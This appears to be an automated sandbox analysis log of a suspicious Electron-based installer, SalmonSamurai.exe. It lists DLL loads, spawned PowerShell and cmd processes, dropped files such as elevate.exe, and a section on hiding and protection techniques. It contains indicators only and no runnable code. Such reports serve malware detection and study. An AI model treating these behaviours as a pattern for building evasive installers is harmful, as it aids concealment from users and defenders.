Source: C:\Users\user\AppData\Roaming\NsisExtracted\SalmonSamurai.exe Section loaded: dhcpcsvc.dll
Source: C:\Users\user\AppData\Roaming\NsisExtracted\SalmonSamurai.exe Section loaded: propsys.dll
Source: C:\Users\user\AppData\Roaming\NsisExtracted\SalmonSamurai.exe Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Roaming\NsisExtracted\SalmonSamurai.exe Section loaded: cryptbase.dll
Source: C:\Users\user\AppData\Roaming\NsisExtracted\SalmonSamurai.exe Section loaded: powrprof.dll
Source: C:\Users\user\AppData\Roaming\NsisExtracted\SalmonSamurai.exe Section loaded: umpdc.dll
Source: C:\Users\user\AppData\Roaming\NsisExtracted\SalmonSamurai.exe Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Roaming\NsisExtracted\SalmonSamurai.exe Section loaded: mswsock.dll
Source: C:\Users\user\AppData\Roaming\NsisExtracted\SalmonSamurai.exe Section loaded: ntmarta.dll
Source: C:\Users\user\AppData\Roaming\NsisExtracted\SalmonSamurai.exe Section loaded: kbdus.dll
Source: C:\Users\user\AppData\Roaming\NsisExtracted\SalmonSamurai.exe Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Roaming\NsisExtracted\SalmonSamurai.exe Section loaded: napinsp.dll
Source: C:\Users\user\AppData\Roaming\NsisExtracted\SalmonSamurai.exe Section loaded: pnrpnsp.dll
Source: C:\Users\user\AppData\Roaming\NsisExtracted\SalmonSamurai.exe Section loaded: wshbth.dll
Source: C:\Users\user\AppData\Roaming\NsisExtracted\SalmonSamurai.exe Section loaded: nlaapi.dll
Source: C:\Users\user\AppData\Roaming\NsisExtracted\SalmonSamurai.exe Section loaded: dnsapi.dll
Source: C:\Users\user\AppData\Roaming\NsisExtracted\SalmonSamurai.exe Section loaded: winrnr.dll
Source: C:\Users\user\AppData\Roaming\NsisExtracted\SalmonSamurai.exe Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Roaming\NsisExtracted\SalmonSamurai.exe Section loaded: wldp.dll
Source: C:\Users\user\AppData\Roaming\NsisExtracted\SalmonSamurai.exe Section loaded: dpapi.dll
Source: C:\Users\user\AppData\Roaming\NsisExtracted\SalmonSamurai.exe Section loaded: dhcpcsvc6.dll
Source: C:\Users\user\AppData\Roaming\NsisExtracted\SalmonSamurai.exe Section loaded: textinputframework.dll
Source: C:\Users\user\AppData\Roaming\NsisExtracted\SalmonSamurai.exe Section loaded: coreuicomponents.dll
Source: C:\Users\user\AppData\Roaming\NsisExtracted\SalmonSamurai.exe Section loaded: coremessaging.dll
Source: C:\Users\user\AppData\Roaming\NsisExtracted\SalmonSamurai.exe Section loaded: coremessaging.dll
Source: C:\Users\user\AppData\Roaming\NsisExtracted\SalmonSamurai.exe Section loaded: wintypes.dll
Source: C:\Users\user\AppData\Roaming\NsisExtracted\SalmonSamurai.exe Section loaded: wintypes.dll
Source: C:\Users\user\AppData\Roaming\NsisExtracted\SalmonSamurai.exe Section loaded: wintypes.dll
Source: C:\Users\user\AppData\Roaming\NsisExtracted\SalmonSamurai.exe Section loaded: windows.ui.dll
Source: C:\Users\user\AppData\Roaming\NsisExtracted\SalmonSamurai.exe Section loaded: windowmanagementapi.dll
Source: C:\Users\user\AppData\Roaming\NsisExtracted\SalmonSamurai.exe Section loaded: inputhost.dll
Source: C:\Users\user\AppData\Roaming\NsisExtracted\SalmonSamurai.exe Section loaded: twinapi.appcore.dll
Source: C:\Users\user\AppData\Roaming\NsisExtracted\SalmonSamurai.exe Section loaded: twinapi.appcore.dll
Source: C:\Users\user\AppData\Roaming\NsisExtracted\SalmonSamurai.exe Section loaded: profapi.dll
Source: C:\Users\user\AppData\Roaming\NsisExtracted\SalmonSamurai.exe Section loaded: wtsapi32.dll
Source: C:\Users\user\AppData\Roaming\NsisExtracted\SalmonSamurai.exe Section loaded: winsta.dll
Source: C:\Users\user\AppData\Roaming\NsisExtracted\SalmonSamurai.exe Section loaded: mscms.dll
Source: C:\Users\user\AppData\Roaming\NsisExtracted\SalmonSamurai.exe Section loaded: coloradapterclient.dll
Source: C:\Users\user\AppData\Roaming\NsisExtracted\SalmonSamurai.exe Section loaded: mmdevapi.dll
Source: C:\Users\user\AppData\Roaming\NsisExtracted\SalmonSamurai.exe Section loaded: devobj.dll
Source: C:\Users\user\AppData\Roaming\NsisExtracted\SalmonSamurai.exe Section loaded: msasn1.dll
Source: C:\Users\user\AppData\Roaming\NsisExtracted\SalmonSamurai.exe Section loaded: cryptsp.dll
Source: C:\Users\user\AppData\Roaming\NsisExtracted\SalmonSamurai.exe Section loaded: rsaenh.dll
Source: C:\Users\user\AppData\Roaming\NsisExtracted\SalmonSamurai.exe Section loaded: gpapi.dll
Source: C:\Windows\System32\chcp.com Section loaded: ulib.dll
Source: C:\Windows\System32\chcp.com Section loaded: fsutilext.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: atl.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: mscoree.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: version.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rsaenh.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptbase.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: windows.storage.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wldp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: msasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: gpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: amsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: userenv.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: profapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: msisip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wshext.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: appxsip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: opcservices.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: uxtheme.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: secur32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: sspicli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: urlmon.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: iertutil.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: srvcli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: netutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: propsys.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wininet.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: microsoft.management.infrastructure.native.unmanaged.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: mi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: miutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wmidcom.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: dpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wbemcomn.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rsaenh.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptbase.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: windows.storage.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wldp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: msasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: gpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: amsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: userenv.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: profapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: msisip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wshext.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: appxsip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: opcservices.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: uxtheme.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: secur32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: sspicli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: urlmon.dll
Source: C:\Users\user\AppData\Roaming\NsisExtracted\SalmonSamurai.exe Section loaded: ffmpeg.dll
Source: C:\Users\user\AppData\Roaming\NsisExtracted\SalmonSamurai.exe Section loaded: uiautomationcore.dll
Source: C:\Users\user\AppData\Roaming\NsisExtracted\SalmonSamurai.exe Section loaded: dbghelp.dll
Source: C:\Users\user\AppData\Roaming\NsisExtracted\SalmonSamurai.exe Section loaded: winmm.dll
Source: C:\Users\user\AppData\Roaming\NsisExtracted\SalmonSamurai.exe Section loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Roaming\NsisExtracted\SalmonSamurai.exe Section loaded: version.dll
Source: C:\Users\user\AppData\Roaming\NsisExtracted\SalmonSamurai.exe Section loaded: userenv.dll
Source: C:\Users\user\AppData\Roaming\NsisExtracted\SalmonSamurai.exe Section loaded: dwrite.dll
Source: C:\Users\user\AppData\Roaming\NsisExtracted\SalmonSamurai.exe Section loaded: secur32.dll
Source: C:\Users\user\AppData\Roaming\NsisExtracted\SalmonSamurai.exe Section loaded: winhttp.dll
Source: C:\Users\user\AppData\Roaming\NsisExtracted\SalmonSamurai.exe Section loaded: dhcpcsvc.dll
Source: C:\Users\user\AppData\Roaming\NsisExtracted\SalmonSamurai.exe Section loaded: propsys.dll
Source: C:\Users\user\AppData\Roaming\NsisExtracted\SalmonSamurai.exe Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Roaming\NsisExtracted\SalmonSamurai.exe Section loaded: cryptbase.dll
Source: C:\Users\user\AppData\Roaming\NsisExtracted\SalmonSamurai.exe Section loaded: powrprof.dll
Source: C:\Users\user\AppData\Roaming\NsisExtracted\SalmonSamurai.exe Section loaded: umpdc.dll
Source: C:\Users\user\AppData\Roaming\NsisExtracted\SalmonSamurai.exe Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Roaming\NsisExtracted\SalmonSamurai.exe Section loaded: mswsock.dll
Source: C:\Users\user\AppData\Roaming\NsisExtracted\SalmonSamurai.exe Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Roaming\NsisExtracted\SalmonSamurai.exe Section loaded: dxgi.dll
Source: C:\Users\user\AppData\Roaming\NsisExtracted\SalmonSamurai.exe Section loaded: resourcepolicyclient.dll
Source: C:\Users\user\AppData\Roaming\NsisExtracted\SalmonSamurai.exe Section loaded: mf.dll
Source: C:\Users\user\AppData\Roaming\NsisExtracted\SalmonSamurai.exe Section loaded: mfplat.dll
Source: C:\Users\user\AppData\Roaming\NsisExtracted\SalmonSamurai.exe Section loaded: rtworkq.dll
Source: C:\Users\user\AppData\Roaming\NsisExtracted\SalmonSamurai.exe Section loaded: msmpeg2vdec.dll
Source: C:\Users\user\AppData\Roaming\NsisExtracted\SalmonSamurai.exe Section loaded: mfperfhelper.dll
Source: C:\Users\user\AppData\Roaming\NsisExtracted\SalmonSamurai.exe Section loaded: cryptsp.dll
Source: C:\Users\user\AppData\Roaming\NsisExtracted\SalmonSamurai.exe Section loaded: dxva2.dll
Source: C:\Users\user\AppData\Roaming\NsisExtracted\SalmonSamurai.exe Section loaded: msvproc.dll
Source: C:\Users\user\AppData\Roaming\NsisExtracted\SalmonSamurai.exe Section loaded: dwmapi.dll
Source: C:\Users\user\AppData\Roaming\NsisExtracted\SalmonSamurai.exe Section loaded: ntmarta.dll
Source: C:\Users\user\AppData\Roaming\NsisExtracted\SalmonSamurai.exe Section loaded: kbdus.dll
Source: C:\Users\user\AppData\Roaming\NsisExtracted\SalmonSamurai.exe Section loaded: nlaapi.dll
Source: C:\Users\user\AppData\Roaming\NsisExtracted\SalmonSamurai.exe Section loaded: dhcpcsvc6.dll
Source: C:\Users\user\AppData\Roaming\NsisExtracted\SalmonSamurai.exe Section loaded: dnsapi.dll
Source: C:\Users\user\AppData\Roaming\NsisExtracted\SalmonSamurai.exe Section loaded: rasadhlp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: napinsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: pnrpnsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wshbth.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: nlaapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: iphlpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: mswsock.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: dnsapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: winrnr.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: fwpuclnt.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rasadhlp.dll
Source: C:\Users\user\Desktop\SalmonSamurai.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f486a52-3cb1-48fd-8f50-b8dc300d9f9d}\InProcServer32
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll
Source: SalmonSamurai.exeStatic PE information: certificate valid
Source: SalmonSamurai.exeStatic file information: File size 74023200 > 1048576
Source: SalmonSamurai.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Source: Binary string: ystem.Core.pdb source: powershell.exe, 0000000D.00000002.2286461966.000001F01D4BC000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: ws\dll\System.Core.pdb source: powershell.exe, 0000000E.00000002.2131359909.0000015DDA2DE000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: Microsoft.Powershell.PSReadline.pdbY source: powershell.exe, 0000000E.00000002.2289613661.0000015DF2550000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Program Files\WindowsPowerShell\Modules\PSReadline\2.0.0\Microsoft.Powershell.PSReadline.pdb source: powershell.exe, 0000000E.00000002.2131359909.0000015DDA2F2000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: System.Runtime.Serialization.Formatters.Soape.pdb` source: powershell.exe, 0000000E.00000002.2131359909.0000015DDA2F2000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: System.Core.pdbt.Automation.pdb source: powershell.exe, 0000000E.00000002.2289613661.0000015DF250B000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\Windows\assembly\NativeImages_v4.0.30319_64\System\b187b7f31cee3e87b56c8edca55324e0\System.ni.dll.pdb source: powershell.exe, 0000000D.00000002.2293902761.000001F01D6C3000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: hell.PSReadline.pdb source: powershell.exe, 0000000E.00000002.2131359909.0000015DDA2DE000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: Microsoft.Powershell.PSReadline.pdb source: powershell.exe, 0000000E.00000002.2289613661.0000015DF2550000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.2289613661.0000015DF250B000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: System.Runtime.Serialization.Formatters.Soape.pdbk source: powershell.exe, 0000000E.00000002.2131359909.0000015DDA2F2000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: lambda_methodCore.pdb% source: powershell.exe, 0000000E.00000002.2289613661.0000015DF250B000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: fll\System.Core.pdb source: powershell.exe, 0000000E.00000002.2131359909.0000015DDA2DE000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Core\v4.0_4.0.0.0__b77a5c561934e089\System.Core.pdb source: powershell.exe, 0000000E.00000002.2289613661.0000015DF250B000.00000004.00000020.00020000.00000000.sdmp
Source: libGLESv2.dll.0.drStatic PE information: section name: .00cfg
Source: libGLESv2.dll.0.drStatic PE information: section name: .gxfg
Source: libGLESv2.dll.0.drStatic PE information: section name: .retplne
Source: libGLESv2.dll.0.drStatic PE information: section name: _RDATA
Source: vk_swiftshader.dll.0.drStatic PE information: section name: .00cfg
Source: vk_swiftshader.dll.0.drStatic PE information: section name: .gxfg
Source: vk_swiftshader.dll.0.drStatic PE information: section name: .retplne
Source: vk_swiftshader.dll.0.drStatic PE information: section name: _RDATA
Source: vulkan-1.dll.0.drStatic PE information: section name: .00cfg
Source: vulkan-1.dll.0.drStatic PE information: section name: .gxfg
Source: vulkan-1.dll.0.drStatic PE information: section name: .retplne
Source: vulkan-1.dll.0.drStatic PE information: section name: _RDATA
Source: SalmonSamurai.exe.0.drStatic PE information: section name: .00cfg
Source: SalmonSamurai.exe.0.drStatic PE information: section name: .gxfg
Source: SalmonSamurai.exe.0.drStatic PE information: section name: .retplne
Source: SalmonSamurai.exe.0.drStatic PE information: section name: .rodata
Source: SalmonSamurai.exe.0.drStatic PE information: section name: CPADinfo
Source: SalmonSamurai.exe.0.drStatic PE information: section name: LZMADEC
Source: SalmonSamurai.exe.0.drStatic PE information: section name: _RDATA
Source: SalmonSamurai.exe.0.drStatic PE information: section name: malloc_h
Source: ffmpeg.dll.0.drStatic PE information: section name: .00cfg
Source: ffmpeg.dll.0.drStatic PE information: section name: .gxfg
Source: ffmpeg.dll.0.drStatic PE information: section name: .retplne
Source: ffmpeg.dll.0.drStatic PE information: section name: _RDATA
Source: libEGL.dll.0.drStatic PE information: section name: .00cfg
Source: libEGL.dll.0.drStatic PE information: section name: .gxfg
Source: libEGL.dll.0.drStatic PE information: section name: .retplne
Source: libEGL.dll.0.drStatic PE information: section name: _RDATA
Source: C:\Users\user\Desktop\SalmonSamurai.exeFile created: C:\Users\user\AppData\Roaming\NsisExtracted\resources\elevate.exe
Source: C:\Users\user\Desktop\SalmonSamurai.exeFile created: C:\Users\user\AppData\Roaming\NsisExtracted\SalmonSamurai.exe
Source: C:\Users\user\Desktop\SalmonSamurai.exeFile created: C:\Users\user\AppData\Roaming\NsisExtracted\libGLESv2.dll
Source: C:\Users\user\Desktop\SalmonSamurai.exeFile created: C:\Users\user\AppData\Roaming\NsisExtracted\vulkan-1.dll
Source: C:\Users\user\Desktop\SalmonSamurai.exeFile created: C:\Users\user\AppData\Roaming\NsisExtracted\libEGL.dll
Source: C:\Users\user\Desktop\SalmonSamurai.exeFile created: C:\Users\user\AppData\Roaming\NsisExtracted\ffmpeg.dll
Source: C:\Users\user\Desktop\SalmonSamurai.exeFile created: C:\Users\user\AppData\Roaming\NsisExtracted\d3dcompiler_47.dll
Source: C:\Users\user\Desktop\SalmonSamurai.exeFile created: C:\Users\user\AppData\Roaming\NsisExtracted\vk_swiftshader.dll
Source: C:\Users\user\Desktop\SalmonSamurai.exeFile created: C:\Users\user\AppData\Roaming\NsisExtracted\LICENSE.electron.txt

Hooking and other Techniques for Hiding and Protection

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Users\user\Desktop\SalmonSamurai.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Roaming\NsisExtracted\SalmonSamurai.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Roaming\NsisExtracted\SalmonSamurai.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Roaming\NsisExtracted\SalmonSamurai.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Roaming\NsisExtracted\SalmonSamurai.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
